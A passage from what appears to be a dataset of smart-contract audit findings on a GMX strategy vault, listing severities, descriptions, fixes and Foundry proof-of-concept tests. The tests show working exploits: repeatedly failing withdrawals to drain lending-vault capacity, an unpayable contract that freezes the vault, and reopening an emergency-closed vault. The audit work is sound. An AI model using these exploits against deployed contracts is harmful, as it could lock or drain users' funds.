// the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlipage may result to a revert an cause the tokens stays in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n /// what this return in case zero balance?? zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // revert if zero value, status not open or compound_failed , executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n\\nIn the event of a successful deposit, the contract will set the status to `open` again. However, if the deposit is cancelled, the callback will call `processCompoundCancellation()` function and the status will be set to `compound_failed` as shown in the following code:\\n```\\n function processCompoundCancellation(GMXTypes.Store storage self) external {\\n GMXChecks.beforeProcessCompoundCancellationChecks(self);\\n self.status = GMXTypes.Status.Compound_Failed;\\n\\n emit CompoundCancelled();\\n }\\n```\\n\\nThe issue arises when the deposit is cancelled, and the status becomes `compound_failed`. In this scenario, only the compound function can be called again and only by the keeper, but the tokens have already been swapped for TokenA or TokenB (Because we successfully create a deposit in `GMX` that means the swap was successfull). Consequently, the `amountIn` will be zero, and in this case the compound logic will be skipped.\\n```\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n //compound logic\\n //// rest of code.\\n }\\n```\\n\\nAs a result, the status will remain `compound_failed`, leading to a deadlock. If keeper continue to call this function, no progress will be made, only gas will be wasted. Furthermore, all interactions with the protocol are impossible since the status is `compound_failed`.
incorrect handling of compound cancelation lead vault to stuck at `compound_failed` status\\nin the event of a deposit get cancelled when trying to compound. just add liquidity again without the swapping logic.
strategy vault stuck at `compond_failed` status. prevent any interaction with the protocol\\nkeeper may waste a lot of gas trying to handle this situation .
```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {lt\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlipage may result to a revert an cause the tokens stays in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n /// what this return in case zero balance?? zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // revert if zero value, status not open or compound_failed , executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n
The protocol will mint unnecessary fees if the vault is paused and reopened later.
medium
Unnecessary fees will be minted to the treasury if the vault is paused and reopened later.\\nBased on the test results, the protocol mints 5(this can be more) wei(gvToken) for each `gvToken` every second since the last fee collection. For example, if the `totalSupply` of `gvToken` is 1000000e18 and the time difference between the current block and the last fee collection is 10 seconds, the amount of lp tokens minted as a fee will be 50000000 wei in terms of `gvToken`. This is acceptable when the protocol is functioning properly.\\n```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n\\nHowever, if the protocol needs to be paused due to a hack or other issues, and then the vault is reopened, let's say after 1 month of being paused, the time difference from `block.timestamp - _secondsFromLastCollection` will be = 2630000s\\nIf the first user tries to deposit after the vault reopens, the fees charged will be 1000000e18 * 5 * 2630000 / 1e18 = 1315000000000\\nThis is an unnecessary fee generated for the treasury because the vault was paused for a long time, but the fee is still generated without taking that into account. This can result in the treasury consuming a portion of the user shares.
If the vault is being reopened, there should be a function to override the _store.lastFeeCollected = block.timestamp; with block.timestamp again.
This will lead to a loss of user shares for the duration when the vault was not active. The severity of the impact depends on the fee the protocol charges per second, the totalSupply of vault tokens, and the duration of the vault being paused.
```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n
`emergencyPause` does not check the state before running && can cause loss of funds for users
medium
The `emergencyPause` function in the GMX smart contract can be called by the keeper at any time without pre-transaction checks. In some cases this could result in financial loss for users if the function is executed before the callbacks have executed.\\nThe emergencyPause function lacks a control mechanism to prevent execution before callbacks execution. While it is designed to halt all contract activities in an emergency, its unrestricted execution could disrupt ongoing transactions. For example, if a user calls a function like deposit which involves multiple steps and expects a callback, and emergencyPause is invoked before the callback is executed, the user might lose his funds as he will not be able to mint svTokens.\\nSince `emergencyPause` updates the state of the Vault to `GMXTypes.Status.Paused`, when the callback from GMX executes the `afterDepositExecution` nothing will happen since the conditions are not met. Which means that any deposit amount will not be met by a mint of svTokens.\\n```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the conditions are not met\\n }\\n```\\n\\nIf by any chance, the `processDeposit` function is executed (or any other function from the callback) it will still revert in the beforeChecks (like the beforeProcessDepositChecks).\\n```\\n function beforeProcessDepositChecks(\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Deposit)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\n
To mitigate this risk, the following recommendations should be implemented:\\nIntroduce a state check mechanism that prevents emergencyPause from executing if there are pending critical operations that must be completed to ensure the integrity of in-progress transactions.\\nImplement a secure check that allows emergencyPause to queue behind critical operations, ensuring that any ongoing transaction can complete before the pause takes effect.
If the emergency pause is triggered at an inopportune time, it could:\\nPrevent the completion of in-progress transactions.\\nLead to loss of funds if the transactions are not properly rolled back.\\nErode user trust in the system due to potential for funds to be stuck without recourse.\\nPOC :\\nYou can copy this test in the file GMXEmergencyTest.t.sol then execute the test with the command forge test --mt\\n```\\n function test_UserLosesFundsAfterEmergencyPause() external {\\n deal(address(WETH), user1, 20 ether);\\n uint256 wethBalanceBefore = IERC20(WETH).balanceOf(user1);\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 10e18, 1, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n vm.prank(owner);\\n vault.emergencyPause();\\n\\n vm.prank(user1);\\n mockExchangeRouter.executeDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n uint256 wethBalanceAfter = IERC20(WETH).balanceOf(user1);\\n //Check that no tokens have been minted to user while user loses funds = 10 eth\\n assertEq(IERC20(vault).balanceOf(user1), 0);\\n assertEq(wethBalanceAfter, wethBalanceBefore - 10 ether);\\n\\n }\\n```\\n
```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the conditions are not met\\n }\\n```\\n
try-catch does not store the state when it is reverted
high
If a withdrawal from GMX is successful without any errors, the borrowed amount is repayed to the lending vaults within a try-catch block within the processWithdraw function. Subsequently, the afterWithdrawChecks are performed. If a revert occurs during this step, everything executed within the try-catch block is reseted, and the Vault's status is set to 'Withdraw_Failed.' In such a scenario, a Keeper must call the processWithdrawFailure function. In this case, there is an erroneous attempt to borrow from the LendingVaults again, even though the repayment never actually occurred due to the revert within the try-catch block.\\nHere is a POC that demonstrates how a user can exploit this bug by intentionally causing the afterWithdrawChecks to fail, resulting in additional borrowing from the LendingVault in the processWithdrawFailure function.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from "forge-std/Test.sol";\\nimport { TestUtils } from "../../helpers/TestUtils.sol";\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTypes } from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\n\\nimport { IDeposit } from "../../../contracts/interfaces/protocols/gmx/IDeposit.sol";\\nimport { IEvent } from "../../../contracts/interfaces/protocols/gmx/IEvent.sol";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n //User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. (Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log("DebtAmtBefore: %s", debtAmtTokenBBefore);\\n console.log("DebtAmtAfter: %s", debtAmtTokenBAfter);\\n console.log("leverageBefore: %s", leverageBefore);\\n console.log("leverageAfter: %s", leverageAfter);\\n }\\n}\\n```\\n\\nThe PoC can be started with this command: `forge test --match-test test_POC1 -vv`
In processWithdrawFailure, no more borrowing should occur:\\n```\\nFile: contracts/strategy/gmx/GMXWithdraw.sol#processWithdrawFailure\\nGMXManager.borrow(\\n self,\\n self.withdrawCache.repayParams.repayTokenAAmt,\\n self.withdrawCache.repayParams.repayTokenBAmt\\n);\\n```\\n\\nThese lines of code should be deleted
Users can intentionally deplete the capacity of a lending vault to increase the leverage of a vault. This also results in lending vaults having no capacity left for new deposits. As a result, the utilization rate increases significantly, leading to higher borrowing costs.
```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from "forge-std/Test.sol";\\nimport { TestUtils } from "../../helpers/TestUtils.sol";\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTypes } from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\n\\nimport { IDeposit } from "../../../contracts/interfaces/protocols/gmx/IDeposit.sol";\\nimport { IEvent } from "../../../contracts/interfaces/protocols/gmx/IEvent.sol";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n //User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. (Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log("DebtAmtBefore: %s", debtAmtTokenBBefore);\\n console.log("DebtAmtAfter: %s", debtAmtTokenBAfter);\\n console.log("leverageBefore: %s", leverageBefore);\\n console.log("leverageAfter: %s", leverageAfter);\\n }\\n}\\n```\\n
Setter functions for core GMX contracts
medium
GMX docs state that their `ExchangeRouter` and `GMXOracle` contracts `will` change as new logic is added. Therefore setter functions should be added to `GMXVault.sol` to be able to update the state variables storing those addressed when the need arises.\\nFrom the GMX docs:\\n```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\n
Create setter functions in `GMXVault.sol` as below:\\n```\\n function updateExchangeRouter(address exchangeRouter) external onlyOwner {\\n _store.exchangeRouter = exchangeRouter;\\n emit ExchangeRouterUpdated(exchangeRouter);\\n }\\n\\n function updateGMXOracle(address gmxOracle) external onlyOwner {\\n _store.gmxOracle = gmxOracle;\\n emit GMXOracleUpdated(gmxOracle);\\n }\\n```\\n
Not being able to use the `ExchangeRouter` and `GMXOracle` contracts the protocol would effectively be unusable given their importance.
```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\n
`GMXVault` can be blocked by a malicious actor
high
`GMXVault` can be blocked by malicious actor if he made a `depositNative` call with unpayable contract and the deposit then cancelled by the GMX exchange router (3rd party).\\nUsers can deposit native tokens in vaults that either of its token pair is a WNT (wrapped native token) by calling `GMXVault.depositNative` payable function with the required deposit parameters (such as token, amount, minimum share amount, slippage & execution fees), then this function will invoke `GMXDeposit.deposit` with a `msg.value` equals the amount that the user wants to deposit + execution fees.\\nIn GMXDeposit.deposit: various checks are made to ensure the sanity of the deposit parameters and the elligibility of the user to deposit, and to calculate the required `tokenA` & `tokenB` needed to deposit in the `GMX` protocol, then the sent native tokens are deposited in the WNT contract and an equivalent amount of WNT is transferred to the vault.\\nAnd before the call is made to the `GMXManager.addLiquidity` (where a call is going to be made to the `GMX.exchangeRouter` contract) to add liquidity; the status of the vault is checked if it's `Open`, if yes; then the status of the vault is set to `Deposit` so that no more deposits or withdrawls can be made (the vault will be blocked until the operation succeeds).\\nSo if the operation succeeds in the `GMX` exchange router; the vault callback will invoke `preocessDeposit` function to finish the process and update the vault status to `Open`.\\nAnd if the operation of adding liquidity is cancelled by the `GMX` exchange router (3rd party); the vault callback will invoke `processDepositCancellation` function to rollback the process by repaying the lendingVaults debts and paying back the native tokens sent by the user, then update the vault status to Openso that the vault is open again for deposits and withdrawals.\\nUsually the deposit (liquidity addition to `GMX` protocol) fails if the user sets a very high slippage parameter when making a deposit (dp.slippage).\\nHow can this be exploited to block the vault? Imagine the following scenario:\\nIf a malicious user deploys an unpayable contract (doesn't receive native tokens) and makes a call to the `GMXVault.depositNative` function with a very high slippage to ensure that the deposit will be cancelled by the GMX exchange router.\\nSo when the deposit is cancelled and the vault callback `processDepositCancellation` function is invoked by the router; it will revert as it will try to send back the native tokens to the user who tried to make the deposit (which is the unpayable contract in our case).\\nAnd the status of the vault will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made and the vault will be disabled.\\nThe same scenario will happen if the user got blocklisted later by the deposited token contract (tokenA or tokenB), but the propability of this happening is very low as the GMX exchange router will add liquidity in two transactions with a small time separation between them!\\nCode Instances:\\nGMXVault.depositNative\\n```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n\\nGMXDeposit.deposit /L88\\n```\\n_dc.user = payable(msg.sender);\\n```\\n\\nGMXDeposit.processDepositCancellation /L209-210\\n```\\n(bool success, ) = self.depositCache.user.call{value: address(this).balance}("");\\n require(success, "Transfer failed.");\\n```\\n\\nFoundry PoC:\\nA `BlockerContract.sol` is added to mimick the behaviour of an unpayable contract. add the following contract to the `2023-10-SteadeFi/test/gmx/local/BlockerContract.sol` directory:\\n`// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\n\\nimport {GMXTypes} from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport {GMXVault} from "../../../contracts/strategy/gmx/GMXVault.sol";\\n\\ncontract BlockerContract {\\n constructor() payable {}\\n\\n function callVault(\\n address payable _vaultAddress,\\n GMXTypes.DepositParams memory dp\\n ) external {\\n GMXVault targetVault = GMXVault(_vaultAddress);\\n targetVault.depositNative{value: address(this).balance}(dp);\\n }\\n}`\\n`test_processDepositCancelWillBlockVault` test is added to to the `2023-10-SteadeFi/test/gmx/local/GMXDepositTest.sol` directory; where the blockerContract is deployed with some native tokens to cover deposit amount + execution fees, then this contract calls the `depositNative` via `BlockerContract.callVault`, where the exchange router tries to cancel the deposit but it will not be able as the BlockerContract can't receive back deposited native tokens, and the vault will be blocked.\\nadd this import statement and test to the `GMXDepositTest.sol` file :\\n`import {BlockerContract} from "./BlockerContract.sol";`\\n` function test_processDepositCancelWillBlockVault() external {\\n //1. deploy the blockerContract contract with a msg.value=deposit amount + execution fees:\\n uint256 depositAmount = 1 ether;\\n\\n BlockerContract blockerContract = new BlockerContract{\\n value: depositAmount + EXECUTION_FEE\\n }();\\n\\n //check balance before deposit:\\n uint256 blockerContractEthBalance = address(blockerContract).balance;\\n assertEq(depositAmount + EXECUTION_FEE, blockerContractEthBalance);\\n\\n //2. preparing deposit params to call "depositNative" via the blockerContract:\\n depositParams.token = address(WETH);\\n depositParams.amt = depositAmount;\\n depositParams.minSharesAmt = 0;\\n depositParams.slippage = SLIPPAGE;\\n depositParams.executionFee = EXECUTION_FEE;\\n\\n blockerContract.callVault(payable(address(vault)), depositParams);\\n\\n // vault status is "Deposit":\\n assertEq(uint256(vault.store().status), 1);\\n\\n //3. the blockerContract tries to cancel the deposit, but it will not be able to do beacuse it's unpayable contract:\\n vm.expectRevert();\\n mockExchangeRouter.cancelDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n\\n // vault status will be stuck at "Deposit":\\n assertEq(uint256(vault.store().status), 1);\\n\\n // check balance after cancelling the deposit, where it will be less than the original as no refund has been paid (the blockerContract is unpayable):\\n assertLt(address(blockerContract).balance, blockerContractEthBalance);\\n }`\\nTest result:\\n`$ forge test --mt `test_processDepositCancelWillBlockVault`\\nRunning 1 test for test/gmx/local/GMXDepositTest.sol:GMXDepositTest\\n[PASS] test_processDepositCancelWillBlockVault() (gas: 1419036)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 24.62ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)`
Add a mechanism to enable the user from redeeming his cancelled deposits (pulling) instead of sending it back to him (pushing).
The vault will be blocked as it will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made.
```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n
Emergency Closed Vault Can Be Paused Then Resume
medium
The `emergencyClose` function is intended to be a final measure to repay all debts and shut down the vault permanently, as indicated by the function's documentation. This action should be irreversible to ensure the finality and security of the vault's emergency closure process.\\n```\\nFile: GMXVaul.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n\\nHowever, a pathway exists to effectively reopen a vault after it has been closed using `emergencyClose` by invoking the `emergencyPause` and `emergencyResume` functions. These functions alter the vault's status, allowing for the resumption of operations which contradicts the intended irreversible nature of an emergency close.\\n```\\nFile: GMXEmergency.sol\\n function emergencyPause(\\n GMXTypes.Store storage self\\n ) external {\\n self.refundee = payable(msg.sender);\\n\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n\\n emit EmergencyPause();\\n }\\n```\\n\\n```\\nFile: GMXEmergency.sol\\n function emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n\\n self.refundee = payable(msg.sender);\\n\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nAdd this to GMXEmergencyTest.t.sol and test with forge test --mt test_close_then_pause -vv:\\n```\\n function test_close_then_pause() external {\\n // Pause the vault\\n vault.emergencyPause();\\n console2.log("vault status", uint256(vault.store().status));\\n\\n // Close the vault\\n vault.emergencyClose(deadline);\\n console2.log("vault status", uint256(vault.store().status));\\n\\n // Pause the vault again\\n vault.emergencyPause();\\n console2.log("vault status", uint256(vault.store().status));\\n assertEq(uint256(vault.store().status), 10, "vault status not set to paused");\\n\\n // Resume the vault\\n vault.emergencyResume();\\n console2.log("vault status", uint256(vault.store().status));\\n }\\n```\\n
Implement a permanent state or flag within the vault's storage to irrevocably mark the vault as closed after `emergencyClose` is called. This flag should prevent any further state-altering operations.\\nModify the `emergencyPause` and `emergencyResume` functions to check for this permanent closure flag and revert if the vault has been emergency closed.
The impact of this finding is significant, as it undermines the trust model of the emergency close process. Users and stakeholders expect that once a vault is closed in an emergency, it will remain closed as a protective measure. The ability to resume operations after an emergency closure could expose the vault to additional risks and potentially be exploited by malicious actors, especially if the original closure was due to a security threat.
```\\nFile: GMXVaul.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n
The transfer of ERC-20 tokens with blacklist functionality in process functions can lead to stuck vaults
medium
Inside a few process functions are ERC-20 tokens transfered which could potentially have a blacklist functionality. This can lead to a DoS of the strategy vault. If for example, a blacklisted user withdraws funds.\\nSome ERC-20 tokens like for example USDC (which is used by the system) have the functionality to blacklist specific addresses, so that they are no longer able to transfer and receive tokens. Sending funds to these addresses will lead to a revert. A few of the process functions inside the deposit and withdraw contracts transfer ERC-20 tokens to addresses which could potentially be blacklisted. The system is not in an Open state when a keeper bot interacts with such a process function, and if the call to such a function reverts, the status can not be updated back to Open. Therefore, it will remain in the given status and a DoS for all users occurs. The only possibility that DoS stops would be when the user is no longer blacklisted, which can potentially last forever.\\nThe attack flow (could be accidental) would for example look like this:\\nUSDC Blacklisted user calls withdraw with the wish to withdraw USDC\\nwithdraw function passes and status is updated to GMXTypes.Status.Withdraw\\nKeeper calls the processWithdraw function\\nTransferring USDC tokens to blacklisted user reverts\\nTherefore vault is stuck inside GMXTypes.Status.Withdraw status and all users experience a DoS\\nHere are the code snippets of these dangerous transfers inside process functions:\\n```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of 